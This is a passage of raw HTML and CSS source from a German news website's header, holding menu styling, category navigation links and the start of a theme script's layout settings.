.tdb-menu-item.tdb-hover>a,.tdb_header_menu .tdb-normal-menu ul .tdb-menu-item:hover>a{color:var(--td_theme_color,#4db2ec)}.tdb_header_menu .tdb-normal-menu>ul{left:-15px}.tdb_header_menu.tdb-menu-sub-inline .tdb-normal-menu ul,.tdb_header_menu.tdb-menu-sub-inline .td-pulldown-filter-list{width:100%!important}.tdb_header_menu.tdb-menu-sub-inline .tdb-normal-menu ul li,.tdb_header_menu.tdb-menu-sub-inline .td-pulldown-filter-list li{display:inline-block;width:auto!important}.tdb_header_menu.tdb-menu-sub-inline .tdb-normal-menu,.tdb_header_menu.tdb-menu-sub-inline .tdb-normal-menu .tdb-menu-item{position:static}.tdb_header_menu.tdb-menu-sub-inline .tdb-normal-menu ul ul{margin-top:0!important}.tdb_header_menu.tdb-menu-sub-inline .tdb-normal-menu>ul{left:0!important}.tdb_header_menu.tdb-menu-sub-inline .tdb-normal-menu .tdb-menu-item>a .tdb-sub-menu-icon{float:none;line-height:1}.tdb_header_menu.tdb-menu-sub-inline .tdb-normal-menu .tdb-menu-item:hover>ul,.tdb_header_menu.tdb-menu-sub-inline .tdb-normal-menu .tdb-menu-item.tdb-hover>ul{top:100%}.tdb_header_menu.tdb-menu-sub-inline .tdb-menu-items-dropdown{position:static}.tdb_header_menu.tdb-menu-sub-inline .td-pulldown-filter-list{left:0!important}.tdb-menu .tdb-mega-menu .sub-menu{-webkit-transition:opacity 0.3s ease;transition:opacity 0.3s ease;width:1114px!important}.tdb-menu .tdb-mega-menu .sub-menu,.tdb-menu .tdb-mega-menu .sub-menu>li{position:absolute;left:50%;-webkit-transform:translateX(-50%);transform:translateX(-50%)}.tdb-menu .tdb-mega-menu .sub-menu>li{top:0;width:100%;max-width:1114px!important;height:auto;background-color:#fff;border:1px solid #eaeaea;overflow:hidden}.tdc-dragged .tdb-block-menu ul{visibility:hidden!important;opacity:0!important;-webkit-transition:all 0.3s ease;transition:all 0.3s ease}.tdb-mm-align-screen .tdb-menu .tdb-mega-menu .sub-menu{-webkit-transform:translateX(0);transform:translateX(0)}.tdb-mm-align-parent .tdb-menu .tdb-mega-menu{position:relative}.tdb-menu .tdb-mega-menu .tdc-row:not([class*='stretch_row_']),.tdb-menu .tdb-mega-menu .tdc-row-composer:not([class*='stretch_row_']){width:auto!important;max-width:1240px}.tdb-menu .tdb-mega-menu-page>.sub-menu>li .tdb-page-tpl-edit-btns{position:absolute;top:0;left:0;display:none;flex-wrap:wrap;gap:0 4px}.tdb-menu .tdb-mega-menu-page>.sub-menu>li:hover .tdb-page-tpl-edit-btns{display:flex}.tdb-menu .tdb-mega-menu-page>.sub-menu>li .tdb-page-tpl-edit-btn{background-color:#000;padding:1px 8px 2px;font-size:11px;color:#fff;z-index:100}.tdi_63 .td_block_inner{text-align:center}.tdi_63 .tdb-menu>li{margin-right:10px}.tdi_63 .tdb-menu>li:last-child{margin-right:0}.tdi_63 .tdb-menu-items-dropdown{margin-left:10px}.tdi_63 .tdb-menu-items-empty+.tdb-menu-items-dropdown{margin-left:0}.tdi_63 .tdb-menu>li>a,.tdi_63 .td-subcat-more{padding:0 10px;color:#000000}.tdi_63 .tdb-menu>li .tdb-menu-sep,.tdi_63 .tdb-menu-items-dropdown .tdb-menu-sep{top:-1px}.tdi_63 .tdb-menu>li>a .tdb-sub-menu-icon-svg svg,.tdi_63 .td-subcat-more .tdb-menu-more-subicon-svg svg{width:0px}.tdi_63 .tdb-menu>li>a .tdb-sub-menu-icon,.tdi_63 .td-subcat-more .tdb-menu-more-subicon{margin-left:0px;top:0px}.tdi_63 .td-subcat-more .tdb-menu-more-icon-svg svg{width:13px}.tdi_63 .td-subcat-more .tdb-menu-more-icon{top:0px}.tdi_63 .tdb-menu>li>a .tdb-sub-menu-icon-svg svg,.tdi_63 .tdb-menu>li>a .tdb-sub-menu-icon-svg svg *,.tdi_63 .td-subcat-more .tdb-menu-more-subicon-svg svg,.tdi_63 .td-subcat-more .tdb-menu-more-subicon-svg svg *,.tdi_63 .td-subcat-more .tdb-menu-more-icon-svg,.tdi_63 .td-subcat-more .tdb-menu-more-icon-svg *{fill:#000000}.tdi_63 .tdb-menu>li>a,.tdi_63 .td-subcat-more,.tdi_63 .td-subcat-more>.tdb-menu-item-text{font-family:Work Sans!important;font-size:16px!important;line-height:42px!important;font-weight:700!important;text-transform:none!important}.tdi_63 .tdb-menu .tdb-normal-menu ul .tdb-menu-item>a,.tdi_63 .tdb-menu-items-dropdown .td-pulldown-filter-list li>a{padding:5px 25px}.tdi_63 .tdb-normal-menu ul .tdb-menu-item>a .tdb-sub-menu-icon-svg svg,.tdi_63 .td-pulldown-filter-list .tdb-menu-item>a .tdb-sub-menu-icon svg{width:7px}.tdi_63 .tdb-normal-menu ul .tdb-menu-item>a .tdb-sub-menu-icon,.tdi_63 .td-pulldown-filter-list .tdb-menu-item>a .tdb-sub-menu-icon{right:0;margin-top:1px}.tdi_63 .tdb-menu .tdb-normal-menu ul,.tdi_63 .td-pulldown-filter-list,.tdi_63 .td-pulldown-filter-list .sub-menu{box-shadow:0px 2px 16px 0px rgba(0,0,0,0.12)}.tdi_63 .tdb-menu .tdb-normal-menu ul .tdb-menu-item>a,.tdi_63 .td-pulldown-filter-list li a{font-family:Work Sans!important;font-size:13px!important;line-height:2!important;font-weight:600!important}.tdi_63:not(.tdb-mm-align-screen) .tdb-mega-menu .sub-menu,.tdi_63 .tdb-mega-menu .sub-menu>li{max-width:1392px!important}.tdi_63 .tdb-mega-menu-page>.sub-menu>li{padding:20px}.tdi_63 .tdb-mega-menu .tdb_header_mega_menu{margin-left:0}.tdi_63 .tdb-menu .tdb-mega-menu .sub-menu>li{border-width:0px;box-shadow:0px 4px 16px 0px rgba(0,0,0,0.12)}@media (max-width:1140px){.tdb-menu .tdb-mega-menu .sub-menu>li{width:100%!important}}@media (min-width:1019px) and (max-width:1140px){.tdi_63 .tdb-menu>li{margin-right:8px}.tdi_63 .tdb-menu>li:last-child{margin-right:0}.tdi_63 .tdb-menu-items-dropdown{margin-left:8px}.tdi_63 .tdb-menu-items-empty+.tdb-menu-items-dropdown{margin-left:0}.tdi_63 .tdb-menu>li>a,.tdi_63 .td-subcat-more{padding:0 8px}.tdi_63 .tdb-menu>li>a .tdb-sub-menu-icon-svg svg,.tdi_63 .td-subcat-more .tdb-menu-more-subicon-svg svg{width:9px}.tdi_63 .td-subcat-more .tdb-menu-more-icon-svg svg{width:12px}.tdi_63:not(.tdb-mm-align-screen) .tdb-mega-menu .sub-menu,.tdi_63 .tdb-mega-menu .sub-menu>li{max-width:100%!important}}@media (min-width:768px) and (max-width:1018px){.tdi_63 .tdb-menu>li{margin-right:6px}.tdi_63 .tdb-menu>li:last-child{margin-right:0}.tdi_63 .tdb-menu-items-dropdown{margin-left:6px}.tdi_63 .tdb-menu-items-empty+.tdb-menu-items-dropdown{margin-left:0}.tdi_63 .tdb-menu>li>a,.tdi_63 .td-subcat-more{padding:0 6px}.tdi_63 .tdb-menu>li>a .tdb-sub-menu-icon-svg svg,.tdi_63 .td-subcat-more .tdb-menu-more-subicon-svg svg{width:8px}.tdi_63 .tdb-menu>li>a .tdb-sub-menu-icon,.tdi_63 .td-subcat-more .tdb-menu-more-subicon{margin-left:6px}.tdi_63 .td-subcat-more .tdb-menu-more-icon-svg svg{width:11px}.tdi_63 .tdb-menu>li>a,.tdi_63 .td-subcat-more,.tdi_63 .td-subcat-more>.tdb-menu-item-text{font-size:13px!important;line-height:36px!important}.tdi_63 .tdb-menu .tdb-normal-menu ul .tdb-menu-item>a,.tdi_63 .td-pulldown-filter-list li a{font-size:12px!important}.tdi_63:not(.tdb-mm-align-screen) .tdb-mega-menu .sub-menu,.tdi_63 .tdb-mega-menu .sub-menu>li{max-width:100%!important}.tdi_63 .tdb-mega-menu-page>.sub-menu>li{padding:15px}}</style>
  544. <style>.tdi_63 .tdb-menu>li.current-menu-item>a,.tdi_63 .tdb-menu>li.current-menu-ancestor>a,.tdi_63 .tdb-menu>li.current-category-ancestor>a,.tdi_63 .tdb-menu>li.current-page-ancestor>a,.tdi_63 .tdb-menu>li:hover>a,.tdi_63 .tdb-menu>li.tdb-hover>a,.tdi_63 .tdb-menu-items-dropdown:hover .td-subcat-more{color:#f43f3f}.tdi_63 .tdb-menu>li.current-menu-item>a .tdb-sub-menu-icon-svg svg,.tdi_63 .tdb-menu>li.current-menu-item>a .tdb-sub-menu-icon-svg svg *,.tdi_63 .tdb-menu>li.current-menu-ancestor>a .tdb-sub-menu-icon-svg svg,.tdi_63 .tdb-menu>li.current-menu-ancestor>a .tdb-sub-menu-icon-svg svg *,.tdi_63 .tdb-menu>li.current-category-ancestor>a .tdb-sub-menu-icon-svg svg,.tdi_63 .tdb-menu>li.current-category-ancestor>a .tdb-sub-menu-icon-svg svg *,.tdi_63 .tdb-menu>li.current-page-ancestor>a .tdb-sub-menu-icon-svg svg *,.tdi_63 .tdb-menu>li:hover>a .tdb-sub-menu-icon-svg svg,.tdi_63 .tdb-menu>li:hover>a .tdb-sub-menu-icon-svg svg *,.tdi_63 .tdb-menu>li.tdb-hover>a .tdb-sub-menu-icon-svg svg,.tdi_63 .tdb-menu>li.tdb-hover>a .tdb-sub-menu-icon-svg svg *,.tdi_63 .tdb-menu-items-dropdown:hover .td-subcat-more .tdb-menu-more-icon-svg svg,.tdi_63 .tdb-menu-items-dropdown:hover .td-subcat-more .tdb-menu-more-icon-svg svg *{fill:#f43f3f}.tdi_63 .tdb-menu>li>a:after,.tdi_63 .tdb-menu-items-dropdown .td-subcat-more:after{height:0px;bottom:52px}</style>
  545. <style>.tdi_63 .tdb-menu ul .tdb-normal-menu.current-menu-item>a,.tdi_63 .tdb-menu ul .tdb-normal-menu.current-menu-ancestor>a,.tdi_63 .tdb-menu ul .tdb-normal-menu.current-category-ancestor>a,.tdi_63 .tdb-menu ul .tdb-normal-menu.tdb-hover>a,.tdi_63 .tdb-menu ul .tdb-normal-menu:hover>a,.tdi_63 .tdb-menu-items-dropdown .td-pulldown-filter-list li:hover>a{color:#f43f3f}.tdi_63 .tdb-menu ul .tdb-normal-menu.current-menu-item>a .tdb-sub-menu-icon-svg svg,.tdi_63 .tdb-menu ul .tdb-normal-menu.current-menu-item>a .tdb-sub-menu-icon-svg svg *,.tdi_63 .tdb-menu ul .tdb-normal-menu.current-menu-ancestor>a .tdb-sub-menu-icon-svg svg,.tdi_63 .tdb-menu ul .tdb-normal-menu.current-menu-ancestor>a .tdb-sub-menu-icon-svg svg *,.tdi_63 .tdb-menu ul .tdb-normal-menu.current-category-ancestor>a .tdb-sub-menu-icon-svg svg,.tdi_63 .tdb-menu ul .tdb-normal-menu.current-category-ancestor>a .tdb-sub-menu-icon-svg svg *,.tdi_63 .tdb-menu ul .tdb-normal-menu.tdb-hover>a .tdb-sub-menu-icon-svg svg,.tdi_63 .tdb-menu ul .tdb-normal-menu.tdb-hover>a .tdb-sub-menu-icon-svg svg *,.tdi_63 .tdb-menu ul .tdb-normal-menu:hover>a .tdb-sub-menu-icon-svg svg,.tdi_63 .tdb-menu ul .tdb-normal-menu:hover>a .tdb-sub-menu-icon-svg svg *,.tdi_63 .tdb-menu-items-dropdown .td-pulldown-filter-list li:hover>a .tdb-sub-menu-icon-svg svg,.tdi_63 .tdb-menu-items-dropdown .td-pulldown-filter-list li:hover>a .tdb-sub-menu-icon-svg svg *{fill:#f43f3f}</style><div id=tdi_63 class="td_block_inner td-fix-index"><ul id="menu-main-1" class="tdb-block-menu tdb-menu tdb-menu-items-visible"><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-first tdb-menu-item-button tdb-menu-item tdb-normal-menu menu-item-902"><a href="https://nachrichtenmorgen.de/category/nachricht/"><div class="tdb-menu-item-text">Nachricht</div></a></li>
  546. <li class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item-button tdb-menu-item tdb-normal-menu menu-item-903"><a href="https://nachrichtenmorgen.de/category/politik/"><div class="tdb-menu-item-text">Politik</div></a></li>
  547. <li class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item-button tdb-menu-item tdb-normal-menu menu-item-898"><a href="https://nachrichtenmorgen.de/category/geschaeft-und-dienstleistungen/"><div class="tdb-menu-item-text">Geschäft &amp; Dienstleistungen</div></a></li>
  548. <li class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item-button tdb-menu-item tdb-normal-menu menu-item-896"><a href="https://nachrichtenmorgen.de/category/finanzen-und-vertrag/"><div class="tdb-menu-item-text">Finanzen und Vertrag</div></a></li>
  549. <li class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item-button tdb-menu-item tdb-normal-menu menu-item-893"><a href="https://nachrichtenmorgen.de/category/bewertungen/"><div class="tdb-menu-item-text">Bewertungen</div></a></li>
  550. <li class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item-button tdb-menu-item tdb-normal-menu menu-item-894"><a href="https://nachrichtenmorgen.de/category/bildung/"><div class="tdb-menu-item-text">Bildung</div></a></li>
  551. <li class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item-button tdb-menu-item tdb-normal-menu menu-item-897"><a href="https://nachrichtenmorgen.de/category/essen/"><div class="tdb-menu-item-text">Essen</div></a></li>
  552. <li class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item-button tdb-menu-item tdb-normal-menu menu-item-899"><a href="https://nachrichtenmorgen.de/category/gesundheit/"><div class="tdb-menu-item-text">Gesundheit</div></a></li>
  553. <li class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item-button tdb-menu-item tdb-normal-menu menu-item-900"><a href="https://nachrichtenmorgen.de/category/krypto/"><div class="tdb-menu-item-text">Krypto</div></a></li>
  554. <li class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item-button tdb-menu-item tdb-normal-menu menu-item-901"><a href="https://nachrichtenmorgen.de/category/marketing/"><div class="tdb-menu-item-text">Marketing</div></a></li>
  555. <li class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item-button tdb-menu-item tdb-normal-menu menu-item-904"><a href="https://nachrichtenmorgen.de/category/prominente/"><div class="tdb-menu-item-text">Prominente</div></a></li>
  556. <li class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item-button tdb-menu-item tdb-normal-menu menu-item-905"><a href="https://nachrichtenmorgen.de/category/spiele/"><div class="tdb-menu-item-text">Spiele</div></a></li>
  557. <li class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item-button tdb-menu-item tdb-normal-menu menu-item-906"><a href="https://nachrichtenmorgen.de/category/sport/"><div class="tdb-menu-item-text">Sport</div></a></li>
  558. <li class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item-button tdb-menu-item tdb-mega-menu tdb-mega-menu-inactive tdb-mega-menu-first menu-item-907"><a href="https://nachrichtenmorgen.de/category/wissenschaft-und-technik/"><div class="tdb-menu-item-text">Wissenschaft und Technik</div></a>
  559. <ul class="sub-menu">
  560. <li class="menu-item-0"><div class="tdb-menu-item-text"><div class="tdb_header_mega_menu tdi_66 td-no-subcats td_with_ajax_pagination td-pb-border-top td_block_template_1 td_ajax_preloading_preload"  data-td-block-uid="tdi_66" >
  561. <style>.tdb_header_mega_menu{display:flex;overflow:visible}.tdb_header_mega_menu .block-mega-child-cats{position:relative;padding:22px 0;width:200px;max-height:none;vertical-align:top;text-align:left;overflow:visible}.tdb_header_mega_menu .block-mega-child-cats:before{content:'';position:absolute;top:0;right:0;width:100vw;height:100%;background-color:#fafafa;z-index:-1}.tdb_header_mega_menu .block-mega-child-cats:after{content:'';position:absolute;top:0;left:0;width:100%;height:100%;border-width:0 1px 0 0;border-style:solid;border-color:#eaeaea}.tdb_header_mega_menu .block-mega-child-cats a{display:block;font-size:13px;font-weight:600;color:#333;padding:5px 22px;position:relative;vertical-align:middle;border-width:1px 0;border-style:solid;border-color:transparent;z-index:99}.tdb_header_mega_menu .block-mega-child-cats .cur-sub-cat{background-color:#fff;color:var(--td_theme_color,#4db2ec);border-color:#eaeaea;z-index:99}.tdb_header_mega_menu .td-next-prev-wrap{text-align:left}.tdb_header_mega_menu .td-next-prev-wrap a{width:auto;height:auto;min-width:25px;min-height:25px}.td-js-loaded .tdb_header_mega_menu .td-audio-player{visibility:inherit}.tdb-mega-modules-wrap{flex:1;padding:22px;display:flex;flex-direction:column;justify-content:space-between}.tdb-mega-modules-wrap .td_block_inner{*zoom:1}.tdb-mega-modules-wrap .td_block_inner:before,.tdb-mega-modules-wrap .td_block_inner:after{display:table;content:'';line-height:0}.tdb-mega-modules-wrap .td_block_inner:after{clear:both}.tdb_module_mm .td-author-photo{display:inline-block}.tdb_module_mm .td-author-photo,.tdb_module_mm .td-author-photo img{vertical-align:middle}.tdb_module_mm .td-module-meta-info{text-align:left}.tdi_66 .tdb-mega-modules-wrap{padding:20px}.tdi_66 .block-mega-child-cats{width:100%;padding:20px;width:100%;text-align:center}.tdi_66 .block-mega-child-cats:after{border-width:0px}.tdi_66{flex-direction:column-reverse}.tdi_66 .block-mega-child-cats:before{left:50%;transform:translateX(-50%);right:auto}.tdi_66 .block-mega-child-cats a{display:inline-block;margin-right:10px;margin-bottom:10px;padding:0px;border-width:0px;color:#000000;background:rgba(255,255,255,0);font-family:Work Sans!important;font-size:14px!important;font-weight:600!important}.tdi_66 .block-mega-child-cats a:last-child{margin-right:0}.tdi_66 .block-mega-child-cats .cur-sub-cat{border-width:0px;color:#f43f3f;background:rgba(255,255,255,0);border-color:#000000}.tdi_66:not(.td-no-subcats) .td_module_wrap{width:20%;float:left}.td-md-is-safari .tdi_66:not(.td-no-subcats) .td_module_wrap{margin-right:-1px}.tdi_66.td-no-subcats .td_module_wrap{width:20%;float:left}.td-md-is-safari .tdi_66.td-no-subcats .td_module_wrap{margin-right:-1px}.tdi_66 .td_module_wrap:nth-child(5n+1){clear:both}.tdi_66 .td_module_wrap:nth-last-child(-n+5){margin-bottom:0;padding-bottom:0}.tdi_66 .td_module_wrap:nth-last-child(-n+5) .td-module-container:before{display:none}.tdi_66 .td_module_wrap{padding-left:10px;padding-right:10px;padding-bottom:0px;margin-bottom:0px;display:flex;flex-direction:column}.tdi_66 .td_block_inner{margin-left:-10px;margin-right:-10px;display:flex;flex-wrap:wrap}.tdi_66 .td-module-container:before{bottom:-0px;border-color:#eaeaea}.tdi_66 .td-module-container{border-color:#eaeaea;flex-direction:column;flex:1;flex-basis:auto}.tdi_66 .entry-thumb{background-position:center 50%}.tdi_66 .td-image-wrap{padding-bottom:70%}.tdi_66 .td-image-container{display:block;order:0;margin-left:auto;margin-right:auto}.ie10 .tdi_66 .td-module-meta-info,.ie11 .tdi_66 .td-module-meta-info{flex:auto}.tdi_66 .td-post-vid-time{display:block}.tdi_66 .td-module-meta-info,.tdi_66 .td-next-prev-wrap{text-align:center}.tdi_66 .td-category-pos-image .td-post-category:not(.td-post-extra-category){left:50%;transform:translateX(-50%);-webkit-transform:translateX(-50%)}.tdi_66.td-h-effect-up-shadow .td_module_wrap:hover .td-category-pos-image .td-post-category:not(.td-post-extra-category){transform:translate(-50%,-2px);-webkit-transform:translate(-50%,-2px)}.tdi_66 .td-module-meta-info{padding:15px 0 0 0;border-color:#eaeaea}.tdi_66 .entry-title{margin:0 0 8px 0;font-family:Work Sans!important;font-size:16px!important;line-height:1.2!important;font-weight:600!important}.tdi_66 .td-excerpt{margin:0px;column-count:1;column-gap:48px;display:none}.tdi_66 .td-audio-player{font-size:12px;opacity:1;visibility:visible;height:auto}.tdi_66 .td-post-category:not(.td-post-extra-category){display:none}.tdi_66 .td-author-date{display:inline}.tdi_66 .td-post-author-name{display:none}.tdi_66 .entry-review-stars{display:inline-block}.tdi_66 .td-icon-star,.tdi_66 .td-icon-star-empty,.tdi_66 .td-icon-star-half{font-size:15px}.tdi_66 .td-module-comments{display:none}.tdi_66 .td-author-photo .avatar{width:20px;height:20px;margin-right:6px;border-radius:50%}.tdi_66.td_with_ajax_pagination .td-next-prev-wrap a{border-width:0px;font-size:22px}.tdi_66.td_with_ajax_pagination .td-next-prev-wrap .td-next-prev-icon-svg svg{width:22px;height:calc(22px + 1px)}.tdi_66:not(.td-no-subcats) .block-mega-child-cats:before{background-color:#ffffff}.tdi_66 .td-module-title a{color:#000000;box-shadow:inset 0 0 0 0 #000}.tdi_66 .td_module_wrap:hover .td-module-title a{color:#f43f3f!important}.tdi_66 .td-post-date,.tdi_66 .td-post-author-name span{color:#000000}.tdi_66.td_with_ajax_pagination .td-next-prev-wrap a,.tdi_66 .td-load-more-wrap a{color:#000000;background-color:rgba(255,255,255,0)}.tdi_66.td_with_ajax_pagination .td-next-prev-wrap .td-next-prev-icon-svg svg,.tdi_66.td_with_ajax_pagination .td-next-prev-wrap .td-next-prev-icon-svg svg *{fill:#000000}.tdi_66.td_with_ajax_pagination .td-next-prev-wrap a:hover,.tdi_66 .td-load-more-wrap a:hover{color:#f43f3f;background-color:rgba(255,255,255,0)!important;border-color:rgba(255,255,255,0)!important}.tdi_66.td_with_ajax_pagination .td-next-prev-wrap a:hover .td-next-prev-icon-svg svg,.tdi_66.td_with_ajax_pagination .td-next-prev-wrap a:hover .td-next-prev-icon-svg svg *{fill:#f43f3f}.tdi_66 .td-module-exclusive .td-module-title a:before{display:inline-block;margin:-4px 5px 0 0;padding:3px 5px;border-radius:2px;color:#ffffff;background-color:#ec3535;font-family:Work Sans!important;font-size:12px!important;line-height:1!important;font-weight:500!important;text-transform:uppercase!important;letter-spacing:-0.5px!important}.tdi_66 .td-module-exclusive:hover .td-module-title a:before{color:#ffffff;background-color:#ec3535}.tdi_66 .td-editor-date,.tdi_66 .td-editor-date .td-post-author-name,.tdi_66 .td-module-comments a{font-family:Work Sans!important;font-size:20px!important}html:not([class*='ie']) .tdi_66 .td-module-container:hover .entry-thumb:before{opacity:0}@media (min-width:768px){.tdi_66 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}@media (min-width:1019px) and (max-width:1140px){.tdi_66 .block-mega-child-cats{width:140px}.tdi_66 .block-mega-child-cats a{margin-right:8px;margin-bottom:8px;font-size:13px!important}.tdi_66 .block-mega-child-cats a:last-child{margin-right:0}.tdi_66 .td_module_wrap{padding-bottom:0px!important;margin-bottom:0px!important;clear:none!important;padding-left:7.5px;padding-right:7.5px;padding-bottom:0px;margin-bottom:0px}.tdi_66 .td_module_wrap:nth-last-child(-n+5){margin-bottom:0!important;padding-bottom:0!important}.tdi_66 .td_module_wrap .td-module-container:before{display:block!important}.tdi_66 .td_module_wrap:nth-last-child(-n+5) .td-module-container:before{display:none!important}.tdi_66 .td_module_wrap:nth-child(5n+1){clear:both!important}.tdi_66 .td_block_inner{margin-left:-7.5px;margin-right:-7.5px}.tdi_66 .td-module-container:before{bottom:-0px}.tdi_66 .td-module-meta-info{padding:12px 0 0 0}.tdi_66 .td-module-title a{box-shadow:inset 0 0 0 0 #000}.tdi_66 .td-module-exclusive .td-module-title a:before{font-size:11px!important}.tdi_66 .entry-title{font-size:13px!important}@media (min-width:768px){.tdi_66 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}}@media (min-width:768px) and (max-width:1018px){.tdi_66 .tdb-mega-modules-wrap{padding:15px}.tdi_66 .block-mega-child-cats{width:120px;padding:15px}.tdi_66 .block-mega-child-cats a{margin-right:5px;margin-bottom:5px;font-size:12px!important}.tdi_66 .block-mega-child-cats a:last-child{margin-right:0}.tdi_66 .td_module_wrap{padding-bottom:10px!important;margin-bottom:10px!important;clear:none!important;padding-left:5px;padding-right:5px;padding-bottom:10px;margin-bottom:10px}.tdi_66 .td_module_wrap:nth-last-child(-n+5){margin-bottom:0!important;padding-bottom:0!important}.tdi_66 .td_module_wrap .td-module-container:before{display:block!important}.tdi_66 .td_module_wrap:nth-last-child(-n+5) .td-module-container:before{display:none!important}.tdi_66 .td_module_wrap:nth-child(5n+1){clear:both!important}.tdi_66 .td_block_inner{margin-left:-5px;margin-right:-5px}.tdi_66 .td-module-container:before{bottom:-10px}.tdi_66 .td-module-meta-info{padding:10px 0 0 0}.tdi_66 .entry-title{margin:0px;font-size:11px!important}.tdi_66 .td-post-date,.tdi_66 .td-post-author-name span{display:none}.tdi_66.td_with_ajax_pagination .td-next-prev-wrap{margin-top:10px}.tdi_66 .td-module-title a{box-shadow:inset 0 0 0 0 #000}.tdi_66 .td-module-exclusive .td-module-title a:before{font-size:10px!important;letter-spacing:0px!important}@media (min-width:768px){.tdi_66 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}}@media (max-width:767px){.tdi_66 .td_module_wrap{padding-bottom:0px!important;margin-bottom:0px!important}.tdi_66 .td_module_wrap:nth-last-child(-n+5){margin-bottom:0!important;padding-bottom:0!important}.tdi_66 .td_module_wrap .td-module-container:before{display:block!important}.tdi_66 .td_module_wrap:nth-last-child(-n+5) .td-module-container:before{display:none!important}.tdi_66 .td_module_wrap{clear:none!important;padding-bottom:0px;margin-bottom:0px}.tdi_66 .td_module_wrap:nth-child(5n+1){clear:both!important}.tdi_66 .td-module-container:before{bottom:-0px}.tdi_66 .td-module-title a{box-shadow:inset 0 0 0 0 #000}@media (min-width:768px){.tdi_66 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}}</style><script type="rocketlazyloadscript">var block_tdi_66 = new tdBlock();
  562. block_tdi_66.id = "tdi_66";
  563. block_tdi_66.atts = '{"mm_align_horiz":"content-horiz-left","modules_on_row_regular":"20%","modules_on_row_cats":"20%","image_size":"","modules_category":"above","show_excerpt":"none","show_com":"none","show_date":"eyJwb3J0cmFpdCI6Im5vbmUifQ==","show_author":"none","mm_sub_align_horiz":"content-horiz-right","mm_elem_align_horiz":"content-horiz-center","menu_id":"104","tds_menu_active1-line_color":"","f_elem_font_family":"653","f_elem_font_transform":"none","f_elem_font_size":"eyJwb3J0cmFpdCI6IjEzIiwiYWxsIjoiMTYifQ==","f_elem_font_weight":"700","f_elem_font_line_height":"eyJhbGwiOiI0MnB4IiwicG9ydHJhaXQiOiIzNnB4In0=","more_icon_size":"eyJhbGwiOiIxMyIsInBvcnRyYWl0IjoiMTEiLCJsYW5kc2NhcGUiOiIxMiJ9","elem_space":"eyJhbGwiOiIxMCIsImxhbmRzY2FwZSI6IjgiLCJwb3J0cmFpdCI6IjYifQ==","elem_padd":"eyJhbGwiOiIwIDEwcHgiLCJsYW5kc2NhcGUiOiIwIDhweCIsInBvcnRyYWl0IjoiMCA2cHgifQ==","mm_width":"eyJwb3J0cmFpdCI6IjEwMCUiLCJhbGwiOiIxMzkyIiwibGFuZHNjYXBlIjoiMTAwJSJ9","mm_align_screen":"yes","main_sub_icon_size":"eyJhbGwiOiIwIiwicG9ydHJhaXQiOiI4IiwibGFuZHNjYXBlIjoiOSJ9","main_sub_icon_align":"0","main_sub_icon_space":"eyJhbGwiOiIwIiwicG9ydHJhaXQiOiI2In0=","more_tdicon":"td-icon-dots-circle-medium","tds_menu_sub_active1-sub_text_color_h":"#f43f3f","f_sub_elem_font_family":"653","f_sub_elem_font_size":"eyJhbGwiOiIxMyIsInBvcnRyYWl0IjoiMTIifQ==","f_sub_elem_font_line_height":"2","f_sub_elem_font_weight":"600","sub_elem_padd":"5px 25px","mm_sub_width":"eyJhbGwiOiIxMDAlIiwicG9ydHJhaXQiOiIxMjAiLCJsYW5kc2NhcGUiOiIxNDAifQ==","mm_sub_border":"0","mm_elem_border":"0","mm_elem_border_a":"0","mm_elem_padd":"eyJwb3J0cmFpdCI6IjAiLCJhbGwiOiIwIn0=","mm_border_size":"0","sub_shadow_shadow_size":"16","sub_shadow_shadow_offset_horizontal":"0","sub_shadow_shadow_offset_vertical":"2","sub_shadow_shadow_color":"rgba(0,0,0,0.12)","mm_shadow_shadow_size":"16","mm_shadow_shadow_offset_vertical":"4","mm_shadow_shadow_color":"rgba(0,0,0,0.12)","mm_elem_color":"#000000","mm_elem_color_a":"#f43f3f","mm_elem_order":"id","mm_elem_space":"eyJhbGwiOiIxMCIsInBvcnRyYWl0IjoiNSIsImxhbmRzY2FwZSI6IjgifQ==","mm_elem_bg":"rgba(255,255,255,0)","mm_elem_bg_a":"rgba(255,255,255,0)","mm_elem_border_color_a":"#000000","mm_sub_padd":"eyJhbGwiOiIyMHB4IiwicG9ydHJhaXQiOiIxNXB4In0=","f_mm_sub_font_family":"653","f_mm_sub_font_weight":"600","f_mm_sub_font_size":"eyJhbGwiOiIxNCIsInBvcnRyYWl0IjoiMTIiLCJsYW5kc2NhcGUiOiIxMyJ9","show_cat":"none","f_title_font_family":"653","f_title_font_size":"eyJhbGwiOiIxNiIsImxhbmRzY2FwZSI6IjEzIiwicG9ydHJhaXQiOiIxMSJ9","f_title_font_line_height":"1.2","f_title_font_weight":"600","f_title_font_transform":"","title_txt":"#000000","title_txt_hover":"#f43f3f","image_height":"70","all_modules_space":"eyJhbGwiOiIwIiwicG9ydHJhaXQiOiIyMCJ9","pag_text":"#000000","pag_h_text":"#f43f3f","pag_bg":"rgba(255,255,255,0)","pag_h_bg":"rgba(255,255,255,0)","meta_padding":"eyJhbGwiOiIxNXB4IDAgMCAwIiwibGFuZHNjYXBlIjoiMTJweCAwIDAgMCIsInBvcnRyYWl0IjoiMTBweCAwIDAgMCJ9","art_excerpt":"0","modules_gap":"eyJhbGwiOiIyMCIsImxhbmRzY2FwZSI6IjE1IiwicG9ydHJhaXQiOiIxMCJ9","mm_padd":"eyJhbGwiOiIyMCIsInBvcnRyYWl0IjoiMTUifQ==","pag_space":"eyJwb3J0cmFpdCI6IjEwIn0=","text_color":"#000000","tds_menu_active1-line_alignment":"52","tds_menu_active1-text_color_h":"#f43f3f","mm_subcats_bg